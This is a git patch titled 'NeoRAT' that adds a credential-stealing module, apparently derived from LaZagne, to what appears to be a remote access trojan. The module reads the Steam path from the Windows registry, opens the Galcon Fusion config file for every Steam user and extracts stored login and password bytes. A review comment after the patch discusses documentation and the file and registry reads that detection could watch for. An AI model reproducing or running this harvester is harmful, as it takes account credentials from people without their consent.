From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT
---
.../lazagne/softwares/games/galconfusion.py | 55 ++++++++++++++++++++++
1 file changed, 55 insertions(+)
create mode 100644 foreign/client_handling/lazagne/softwares/games/galconfusion.py
(limited to 'foreign/client_handling/lazagne/softwares/games/galconfusion.py')
diff --git a/foreign/client_handling/lazagne/softwares/games/galconfusion.py b/foreign/client_handling/lazagne/softwares/games/galconfusion.py
new file mode 100644
index 0000000..b4279c5
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/games/galconfusion.py
@@ -0,0 +1,55 @@
+# -*- coding: utf-8 -*-
+
+import os
+
+try:
+ import _winreg as winreg
+except ImportError:
+ import winreg
+
+import foreign.client_handling.lazagne.config.winstructure as win
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import string_to_unicode
+
+
+class GalconFusion(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'galconfusion', 'games', registry_used=True)
+
+ def run(self):
+ creds = []
+ results = None
+
+ # Find the location of steam - to make it easier we're going to use a try block
+ # 'cos I'm lazy
+ try:
+ with win.OpenKey(win.HKEY_CURRENT_USER, 'Software\\Valve\\Steam') as key:
+ results = winreg.QueryValueEx(key, 'SteamPath')
+ except Exception:
+ pass
+
+ if results:
+ steampath = string_to_unicode(results[0])
+ userdata = os.path.join(steampath, u'userdata')
+
+ # Check that we have a userdata directory
+ if not os.path.exists(userdata):
+ self.error(u'Steam doesn\'t have a userdata directory.')
+ return
+
+ # Now look for Galcon Fusion in every user
+ for f in os.listdir(userdata):
+ filepath = os.path.join(userdata, string_to_unicode(f), u'44200\\remote\\galcon.cfg')
+ if not os.path.exists(filepath):
+ continue
+
+ # If we're here we should have a Galcon Fusion file
+ with open(filepath, mode='rb') as cfgfile:
+ # We've found a config file, now extract the creds
+ data = cfgfile.read()
+ creds.append({
+ 'Login': data[4:0x23],
+ 'Password': data[0x24:0x43]
+ })
+
+ return creds
-- cgit v1.2.3
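Review bot: `GalconFusion` and its `run` method carry no docstring, and the slices `data[4:0x23]` and `data[0x24:0x43]` are unexplained magic offsets, so a reader cannot tell from this file what layout of `galcon.cfg` is assumed. A comment above the `creds.append` call such as `# galcon.cfg: Login = bytes 4..0x22, Password = bytes 0x24..0x42, returned as raw bytes (not decoded)` would state what the code actually does. The class docstring should name the two artefacts the module touches: the `SteamPath` value under `HKEY_CURRENT_USER\Software\Valve\Steam` and `userdata\<id>\44200\remote\galcon.cfg` for every entry in `userdata`. No decoding or decryption is applied before the values are returned, so the file appears to hold both fields in directly readable form. For anyone building detections from this commit, a read of that file path or registry value by a process other than Steam or the game is the observable event this module produces.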